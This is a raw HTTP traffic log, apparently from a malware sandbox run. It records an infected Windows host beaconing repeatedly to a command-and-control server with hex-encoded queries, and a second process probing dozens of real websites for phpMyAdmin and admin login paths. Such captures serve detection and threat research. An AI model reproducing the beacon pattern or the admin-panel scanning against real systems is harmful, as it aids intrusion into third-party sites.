Feb 5, 2024 12:15:24.995229959 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:15:25.237082958 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:25 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
326 | 192.168.2.6 | 58318 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:15:33.484558105 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:15:33.727189064 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:33 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
327 | 192.168.2.6 | 58320 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:15:39.283133984 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:15:39.527894020 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:15:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
328 | 192.168.2.6 | 58321 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:15:52.661755085 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:15:52.903367996 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:15:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
329 | 192.168.2.6 | 58307 | 87.233.198.20 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:05.875874043 CET | 198 | OUT | GET /administrator/index.php HTTP/1.1
Host: idp.uitgeverij-deviant.nl
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


Session ID | Source IP | Source Port | Destination IP | Destination Port
330 | 192.168.2.6 | 61894 | 96.7.224.178 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.624286890 CET | 169 | OUT | GET /admin HTTP/1.1
Host: naukrigulf.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.737253904 CET | 623 | IN | HTTP/1.1 403 Forbidden
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 264
Expires: Mon, 05 Feb 2024 11:16:06 GMT
Date: Mon, 05 Feb 2024 11:16:06 GMT
Connection: close
Server-Timing: cdn-cache; desc=HIT
Server-Timing: edge; dur=1
Server-Timing: ak_p; desc="1707131766676_1611129006_213793506_17_10936_164_0_-";dur=1
Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;admin" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131766&#46;cbe3ae2</BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port
331 | 192.168.2.6 | 61896 | 162.241.203.30 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.624345064 CET | 168 | OUT | GET /pma/ HTTP/1.1
Host: nossoplayer.me
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.737034082 CET | 1114 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:16:06 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade
Last-Modified: Thu, 06 Oct 2022 20:52:18 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port
332 | 192.168.2.6 | 61893 | 104.21.14.245 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.624600887 CET | 169 | OUT | GET /admin HTTP/1.1
Host: ag.ufa9999.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.753927946 CET | 1286 | IN | HTTP/1.1 403 Forbidden
Date: Mon, 05 Feb 2024 11:16:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: max-age=15
Expires: Mon, 05 Feb 2024 11:16:21 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wd%2B8JsgC3Td84n6iMZ6k%2Fapyj9BO%2F1FzrIZn6FWKLe%2Ff8nUOtk%2BwhkQVt2N40O8TRwDmVdYW0CtMQcdOnqxnH3dalpuc4mB3BDqTgFVh6C7Yh4tHph%2Bcx%2BNWH6j%2FmAfaXg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abd45bae21353-ATL
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port
333 | 192.168.2.6 | 61916 | 142.250.105.84 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.624694109 CET | 180 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: accounts.google.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.754209042 CET | 485 | IN | HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Feb 2024 11:16:06 GMT
Location: https://accounts.google.com/phpMyAdmin/
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-XSS-Protection: 1; mode=block
Content-Length: 183
Server: GSE


Session ID | Source IP | Source Port | Destination IP | Destination Port
334 | 192.168.2.6 | 61903 | 104.22.43.158 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.624819994 CET | 181 | OUT | GET /PhpMyAdmin/ HTTP/1.1
Host: casinocontroller.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.957309008 CET | 434 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:16:06 GMT
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd45bec80705-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port
335 | 192.168.2.6 | 61908 | 104.21.14.245 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.624878883 CET | 175 | OUT | GET /PhpMyAdmin/ HTTP/1.1
Host: ag.ufa9999.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.753479004 CET | 1286 | IN | HTTP/1.1 403 Forbidden
Date: Mon, 05 Feb 2024 11:16:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: max-age=15
Expires: Mon, 05 Feb 2024 11:16:21 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QvqQ%2FxEnrKR%2F%2BHzb84b6z880W8GyLqGxyi9d8my5iJhBBTbUbwZqNJN7On7QmOmSULYli1fOqVR%2BlQuwt1Y1GuxPOiRNgLhEJ5WpVOMaoq%2FdWaneF%2BE7i213GKAYumaUCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abd45bf6253b9-ATL
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port
336 | 192.168.2.6 | 61902 | 3.141.96.53 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.624906063 CET | 174 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: money-farm.cc
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.748528004 CET | 149 | IN | HTTP/1.1 301 Moved Permanently
location: https://money-farm.cc/phpMyAdmin/
transfer-encoding: chunked
date: Mon, 05 Feb 2024 11:16:06 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
337 | 192.168.2.6 | 61915 | 172.66.40.88 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.624957085 CET | 176 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: warriorplus.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.844867945 CET | 1138 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://warriorplus.com:443/phpMyAdmin/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XEI%2BdWxisX7JToABugEmkKoE3jskP7OA1TLU%2FNWa4dqcVKcUeFwbr7uteRKXRXoEf5NA0yfSx8PcGeVeHJYaejn1NlNgzP6iQi%2Bjii1pa6370Gth6korVnQkNPsczlxm2g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 850abd45bdc5b062-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
Data Ascii: 1f3<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><script defer src="https://static.cloudflareinsights.com/beacon.min.js/v84a3a4012de94ce1a686ba8c167c359c1696973893317" integrity="sha512-euoFGowhlaLqXsPWQ48qSkBSCFs3DPRyiwVu3FjR96cMPx+Fr+gpWRhIafcHwqwCqWS42RZhIudOvEI+Ckf6MA==" data-cf-beacon='{"rayId":"850abd45bdc5b062","version":"2024.2.0","token":"59159b5f6bcc48d1b4295b4ba4ed3b0c"}' crossorigin="anonymous"></script></body></html>
Feb 5, 2024 12:16:06.844887018 CET  5  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
338         192.168.2.6  61936        142.250.105.84  80

Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:16:06.625015020 CET  180  OUT  GET /phpMyAdmin/ HTTP/1.1
Host: accounts.google.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.743627071 CET  485  IN  HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Feb 2024 11:16:06 GMT
Location: https://accounts.google.com/phpMyAdmin/
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-XSS-Protection: 1; mode=block
Content-Length: 183
Server: GSE
Feb 5, 2024 12:16:06.743813038 CET  183  IN  Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef 49 7b 2d 31 10 6b ac 05 45 90 1c da a3 c4 60 04 63 82 c6 82 7f df 98 f6 d8 b9 2c 3b 3b 0c 6f 49 29 ea 8a 26 a4 e4 2c 0f 43 3c 44 c5 69 6d df aa 07 42 19 67 97 6e 19 a7 9d e0 ef
Data Ascii: m0D~EHI{-1kE`c,;;oI)&,C<DimBgn!!6""(x^7ZalyB[wRm+&5iW7!jQ3)W0|


Session ID  Source IP    Source Port  Destination IP  Destination Port
339         192.168.2.6  61935        142.250.105.84  80

Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:16:06.625020027 CET  180  OUT  GET /phpMyAdmin/ HTTP/1.1
Host: accounts.google.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.743877888 CET  485  IN  HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Feb 2024 11:16:06 GMT
Location: https://accounts.google.com/phpMyAdmin/
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-XSS-Protection: 1; mode=block
Content-Length: 183
Server: GSE
Feb 5, 2024 12:16:06.743896008 CET  183  IN  Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef 49 7b 2d 31 10 6b ac 05 45 90 1c da a3 c4 60 04 63 82 c6 82 7f df 98 f6 d8 b9 2c 3b 3b 0c 6f 49 29 ea 8a 26 a4 e4 2c 0f 43 3c 44 c5 69 6d df aa 07 42 19 67 97 6e 19 a7 9d e0 ef
Data Ascii: m0D~EHI{-1kE`c,;;oI)&,C<DimBgn!!6""(x^7ZalyB[wRm+&5iW7!jQ3)W0|


Session ID  Source IP    Source Port  Destination IP  Destination Port
340         192.168.2.6  61914        104.255.105.79  80

Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:16:06.625077963 CET  185  OUT  GET /phpMyAdmin/ HTTP/1.1
Host: signin.rockstargames.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.747587919 CET  148  IN  HTTP/1.0 302 Moved Temporarily
Location: https://signin.rockstargames.com/phpMyAdmin/
Server: BigIP
Connection: Keep-Alive
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
341 | 192.168.2.6 | 61913 | 64.91.249.20 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.625144958 CET | 173 | OUT | GET /PhpMyAdmin/ HTTP/1.1
Host: chainmine.io
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.776612997 CET | 356 | IN | HTTP/1.1 302 Moved Temporarily
Date: Mon, 05 Feb 2024 11:16:06 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
X-Powered-By: PHP/5.4.16
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Location: http://ww7.chainmine.io/PhpMyAdmin/?usid=27&utid=4923817102
Content-Length: 0
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port
342 | 192.168.2.6 | 61925 | 104.26.14.180 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.625148058 CET | 186 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: aeaaamorim.inovarmais.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.752944946 CET | 676 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:06 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 05 Feb 2024 12:16:06 GMT
Location: https://aeaaamorim.inovarmais.com/phpMyAdmin/
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R2y38ci%2FoZL%2FFMBU%2FzWyfj%2BO7cuTHjY8YZeNCaQuJHH6VE1mfas%2BmanHe%2BJjdszSuGoHimXK%2BbYn8SVWudOV906KDWzpLyDMe9ETP9mqUdOJfGRKOfgqJuFP9d0DdEu%2BWpacWoqocNJk%2FSU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abd45b997b0b1-ATL
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
343 | 192.168.2.6 | 61933 | 195.85.23.95 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.625372887 CET | 177 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: ro.bongacams.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.849724054 CET | 756 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:06 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
location: https://ro.bongacams.com/phpMyAdmin
x-bc: ded7020
x-zone: 3-web65-ded7020
CF-Cache-Status: DYNAMIC
Set-Cookie: __cf_bm=KQdoXLmOQJcbKhseP.EtWw3LEkzLnC8sr1PsAAKoLRQ-1707131766-1-AcAdZDV71hWzvP/naP9SO7zlMUviMxenx2XZEG+PYPwmGnbNdLYV5lTQ80fTSr2r8GyBcPqDeaCsRfND4BxM5tI=; path=/; expires=Mon, 05-Feb-24 11:46:06 GMT; domain=.bongacams.com; HttpOnly; SameSite=None
Server: cloudflare
CF-RAY: 850abd45b9c82439-ATL
alt-svc: h3=":443"; ma=86400
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
344 | 192.168.2.6 | 61950 | 162.241.203.30 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.625483990 CET | 173 | OUT | GET /admin.php HTTP/1.1
Host: nossoplayer.me
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.745407104 CET | 1114 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:16:06 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade
Last-Modified: Thu, 06 Oct 2022 20:52:18 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 836
Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port
345 | 192.168.2.6 | 61942 | 172.203.148.34 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.629240990 CET | 180 | OUT | GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: eei.uniandes.edu.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.746551037 CET | 155 | IN | HTTP/1.1 302 Found : Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://eei.uniandes.edu.co/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port
346 | 192.168.2.6 | 61945 | 104.18.32.109 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.631984949 CET | 174 | OUT | GET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: sport.autoplay.cloud
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.767821074 CET | 606 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://sport.autoplay.cloud/pma/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=rFUJfVj1Ep.q_B9GVJgxzRAsmv8ckHLmwIsjPmWiRVg-1707131766-1-AY/3/Y1ibVQoZ02SpACliRC5KzwLKzUsJaFlR0Fp8h0OnCoU9JdfgWjzL8hsfJH31BsORQsD0Bm2yRzlPv66gM0=; path=/; expires=Mon, 05-Feb-24 11:46:06 GMT; domain=.autoplay.cloud; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd45cc89677b-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
347 | 192.168.2.6 | 58322 | 185.196.8.22 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.649481058 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:16:06.894161940 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port
348 | 192.168.2.6 | 61924 | 201.134.41.61 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.650893927 CET | 180 | OUT | GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: academico.um.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.813205957 CET | 572 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Location: https://academico.um.edu.mx/academico/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 342
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
